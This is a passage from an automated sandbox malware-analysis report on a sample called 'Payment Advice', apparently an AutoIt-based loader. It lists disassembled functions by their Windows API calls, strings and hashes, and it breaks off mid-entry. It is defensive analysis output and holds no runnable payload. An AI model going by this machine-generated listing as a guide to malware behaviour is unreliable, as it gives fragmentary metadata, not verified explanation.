GetDeviceCaps.GDI32(00000000,0000000C), ref: 005FB2C3
ReleaseDC.USER32 ref: 005FB2E2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 75e08bf62dbfa2a97d94da6cd6a9bb8f5cd7bb5c3320b0c8bf16529ef096d41b
Instruction ID: 568fc4b1d8a9b5a710aab1d4aa3c0e8d36d8cf1f509e74a7554b6b904a70095e
Opcode Fuzzy Hash: 75e08bf62dbfa2a97d94da6cd6a9bb8f5cd7bb5c3320b0c8bf16529ef096d41b
Instruction Fuzzy Hash: F7E012B5140204EFEB006FB0C848A2E7FAAFB4C360F119A0AF95A8B210CB7998408B50

Function 005FB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005FB2AE
GetDC.USER32(00000000), ref: 005FB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 005FB2C3
ReleaseDC.USER32 ref: 005FB2E2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c0a7592b34101ec859e1581fa0881def4b57d5610cf60c05c92c65a56feabed1
Instruction ID: 3f185c98d2b4acf019a9bbff4587b6957ac3467eb0d6e47c0d0ca7a7b92d34e8
Opcode Fuzzy Hash: c0a7592b34101ec859e1581fa0881def4b57d5610cf60c05c92c65a56feabed1
Instruction Fuzzy Hash: 65E046B1540200EFDF005FB0C84C62E7FAAFB4C390F119A09F95E8B210CB7A98408F10

Function 005BDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 005BDEAA

Strings

AutoIt3GUI, xrefs: 005BDE22
Container, xrefs: 005BDE29

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 516392abc86ff2b7392fd2db36f789efb684ba3dffc43628399245eadfad2a7d
Instruction ID: bad0f918700163da0193a4daf04b4ddc48966c8360e12e696a51edf5d58768d6
Opcode Fuzzy Hash: 516392abc86ff2b7392fd2db36f789efb684ba3dffc43628399245eadfad2a7d
Instruction Fuzzy Hash: 46913A746006029FDB14DF64C884FAABBF9BF49714F24856DF94ACB291EB71E841CB60

Function 005C290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 005C2A72

Strings

I/_, xrefs: 005C29FC, 005C2A64, 005C2A12
I/_, xrefs: 005C297F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscpy
String ID: I/_$I/_
API String ID: 3048848545-3113613827
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: 0873073fdb218bf4aac364990c493e3df4f64944daa3eb93f9dac398cb4346e3
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: 53418D35900216AECF25EFD8D845EFDBFB0FF48710F54505EE881A7191EA709A82D7A4

Function 0059BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0059BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0059BCF3

Strings

@, xrefs: 0059BCE8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 650d416485d3c6a3a05b1b3ddf8e2b8a9eea3352caef43d5b92621128af4c9a0
Instruction ID: f0fa5281f3c3fbec0ca9fd094722f54a266fcea39433dd77d01503ee1d63f419
Opcode Fuzzy Hash: 650d416485d3c6a3a05b1b3ddf8e2b8a9eea3352caef43d5b92621128af4c9a0
Instruction Fuzzy Hash: 18513A71409745ABE720AF54DC8ABAFBBE8FFD5354F41484DF1C8420A2DB7089A8C792

Function 005CC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 005844ED: __fread_nolock.LIBCMT ref: 0058450B

_wcscmp.LIBCMT ref: 005CC65D
_wcscmp.LIBCMT ref: 005CC670

Strings

FILE, xrefs: 005CC5A5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: c63853236b34a5526dffb55a3be451731b7a0f30df2b22a212302af07999775e
Instruction ID: 5b2800a506c3772a5f6c05f31f7c95c1dc34a1beda270f29c4569cb7c4a06578
Opcode Fuzzy Hash: c63853236b34a5526dffb55a3be451731b7a0f30df2b22a212302af07999775e
Instruction Fuzzy Hash: 2041D472A0021BBEDF20AAE48C46FEF7FB9BF89714F004469FA05F7181D6759A048B50

Function 005EA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 005EA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005EA86F

Strings

', xrefs: 005EA7C3

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f5bf9b6b9fd52b84aa46be8461f173a138b9702fcbfdc6131c9b2b1c698e7706
Instruction ID: acfffb61310425d8ecc363fbba48b25009db29fff6a00e4502835a15d002bbcc
Opcode Fuzzy Hash: f5bf9b6b9fd52b84aa46be8461f173a138b9702fcbfdc6131c9b2b1c698e7706
Instruction Fuzzy Hash: D7411974E013499FDB18CF69C880BDA7BB9FB09300F11116AE945EB341D770A941CFA1

Function 005E975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 005E980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005E984A

Strings

static, xrefs: 005E97AA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8bf69e64e79a69d5567928454b0c387f3173f47421971c6d2713902e7e0335f5
Instruction ID: 739f88e42563f7f3ba12bb6f44e7a345c54c2dd897399d77c0b5df180b15bf8a
Opcode Fuzzy Hash: 8bf69e64e79a69d5567928454b0c387f3173f47421971c6d2713902e7e0335f5
Instruction Fuzzy Hash: B931AD71110645AEEB149F75CC81BFB7BA9FF99760F009619F8E9C71A0DA31AC81CB60

Function 005C5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005C5201

Strings

0, xrefs: 005C51BF

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9923860d0aa8843f80c81d24f2ed1fca4acd1b39acc203e0ca6d526fc69f6233
Instruction ID: 415413a94108c0d3afd02a77dad9e9d301da2d0c05916ce6eae87aa3c908eb03
Opcode Fuzzy Hash: 9923860d0aa8843f80c81d24f2ed1fca4acd1b39acc203e0ca6d526fc69f6233
Instruction Fuzzy Hash: ED31E1396002059FEB24CFD8D849FAEBFF9BF85350F14001DE981A61A0F770AA84DB10

Function 005D658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 005D6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 005D65FA
, $, xrefs: 005D6648

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 294575db79a47d03ff8aee7e2465f3676cb44d5fdf259ed0892dae779c28676b
Instruction ID: baaa3f9b055290ec32c7760705d109d12016f0160a78a7b7f3b3720b37b27d11
Opcode Fuzzy Hash: 294575db79a47d03ff8aee7e2465f3676cb44d5fdf259ed0892dae779c28676b
Instruction Fuzzy Hash: 8C216471600119ABCF20EFA4D886EAE7FB5BF85740F00045AF905AB281DB70EA45CBA5

Function 005E93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005E945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005E9467

Strings

Combobox, xrefs: 005E9429

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: ca85a1fc5f747f7891dd3bb19bbb30725d24d2b26a1e12f47c56a6aacfe9892a
Instruction ID: cd074af3918a65f55a342736398beaa77adc069218b431e714eba02e9a7be117
Opcode Fuzzy Hash: ca85a1fc5f747f7891dd3bb19bbb30725d24d2b26a1e12f47c56a6aacfe9892a
Instruction Fuzzy Hash: D311B2B23102496FEF199E55DC80EBB3B6FFB883A4F100125F958972E0D6319C528760

Function 005EDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

GetActiveWindow.USER32 ref: 005EDA7B
EnumChildWindows.USER32(?,005ED75F,00000000), ref: 005EDAF5

Strings

T1], xrefs: 005EDAFB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1]
API String ID: 3814560230-1198749061
Opcode ID: 94ec37f4b6bfc82ff99ffb13b4368c948d98f7696275a7272cd0920e9166d2a7
Instruction ID: 05ebf61217a84f0abaca9f4593dd9ed61bc63fb52b9a1d6fdee58df9c4b55429
Opcode Fuzzy Hash: 94ec37f4b6bfc82ff99ffb13b4368c948d98f7696275a7272cd0920e9166d2a7
Instruction Fuzzy Hash: AA213879204201DFDB14DF29D850AA57BF6FF5A320F151619F9A98B3E0D731A840CF60

Function 005E98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0059D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0059D1BA
Part of subcall function 0059D17C: GetStockObject.GDI32(00000011), ref: 0059D1CE
Part of subcall function 0059D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059D1D8

GetWindowRect.USER32(00000000,?), ref: 005E9968
GetSysColor.USER32(00000012), ref: 005E9982

Strings

static, xrefs: 005E9945

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 2dad85392e426dec4a9717849c70d0d2674f74414d426361e56d47527481994b
Instruction ID: 7e1737662786eceddcb63f94c8334904009846ea51571a76638ad5b841c3ac17
Opcode Fuzzy Hash: 2dad85392e426dec4a9717849c70d0d2674f74414d426361e56d47527481994b
Instruction Fuzzy Hash: 51116A7252020AAFDB04DFB8CC45AEA7BB9FB08344F015619F995D3151E735E850DB60

Function 005E9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 005E9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005E96A8

Strings

edit, xrefs: 005E967D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 3ab12b9eb9ca4e4c090abb9986d54a7f847d125eefdc7e8418e9f3da22922549
Instruction ID: a290b506ad855de1f643fe6bf57a3f5ff05aac91e3d00b2cea657c47b7a91cdc
Opcode Fuzzy Hash: 3ab12b9eb9ca4e4c090abb9986d54a7f847d125eefdc7e8418e9f3da22922549
Instruction Fuzzy Hash: 6A11BC71100189ABEF158FA5DC44EEB3B6AFB05378F100716F9A5971E0C731DC909760

Function 005C5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005C52F4

Strings

0, xrefs: 005C52CE

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 672defa5ab85e878368cb0a25a3c60845eb7eea80b09d05520b119db6814a58e
Instruction ID: f0f11f5f81fddf9a3663c03742dd9140e2a6bb618b66adcc32e5fe6ac08eb20e
Opcode Fuzzy Hash: 672defa5ab85e878368cb0a25a3c60845eb7eea80b09d05520b119db6814a58e
Instruction Fuzzy Hash: 4E11B176A01654AFDF10DED8D904F997FA9BB46B50F040019E942A7190E3B0BD84C790

Function 005D4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005D4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 005D4E1E

Strings

<local>, xrefs: 005D4DE6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 10264096ecf416bcdfa5a58de5ca256792be32a92990b4e43f9fcbd0d92a9557
Instruction ID: ad3dcc57a1ccaabcd603c2897abea5f0ec157d4b8ef23106893edbe7be95807d
Opcode Fuzzy Hash: 10264096ecf416bcdfa5a58de5ca256792be32a92990b4e43f9fcbd0d92a9557
Instruction Fuzzy Hash: 0F119A70501221BBDB359BA98889EFBFFAAFF06755F10862BF50596240D3705980CAE0

Function 005AA70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005B37A7
___raise_securityfailure.LIBCMT ref: 005B388E

Strings

(d, xrefs: 005B3889

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (d
API String ID: 3761405300-913184070
Opcode ID: ee5870d41cacb93fdd71aa2e1658d12fd0135759813d90e2752b9031077f466e
Instruction ID: a822ad5b20b2b6d7523feb17fb90db66387c4ce7a41856a8ebad277153d1fcee
Opcode Fuzzy Hash: ee5870d41cacb93fdd71aa2e1658d12fd0135759813d90e2752b9031077f466e
Instruction Fuzzy Hash: 362114B8910224DAE700DF55E9856803BB2FB4E310F10682AEA048B7B1E3B069A5CB85

Function 005DA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 005DA84E
htons.WSOCK32(00000000,?,00000000), ref: 005DA88B

Strings

255.255.255.255, xrefs: 005DA866

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: a56afb1e214d2d4553303e8fef5dc94bfc47e3dc2b1bf119c753676f7e0cfb44
Instruction ID: 68829e4deee45a2c9c7c3d37567248fc51e4a8d68d0f4cfad61b9b48f3d59f3f
Opcode Fuzzy Hash: a56afb1e214d2d4553303e8fef5dc94bfc47e3dc2b1bf119c753676f7e0cfb44
Instruction Fuzzy Hash: C4012635200305ABCB21DFA8C84AFAABB65FF44310F10892BF915A73D1D731E8019752

Function 005BB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005BB7EF

Strings

ComboBox, xrefs: 005BB78B
ListBox, xrefs: 005BB7B9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: fe1570ef1bf636a58ff494f4fe681109f2192d2d94922f3ed5ba95d941d19141
Instruction ID: aabd86fe9e2de65f9159784d202005f2d37efbec1e25f8195964847d556d303f
Opcode Fuzzy Hash: fe1570ef1bf636a58ff494f4fe681109f2192d2d94922f3ed5ba95d941d19141
Instruction Fuzzy Hash: 9A01D475640116ABDB05FBA4CC569FE3BBDBF86350B44061DF862672D2EFB0690887A0

Function 005BB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 005BB6EB

Strings

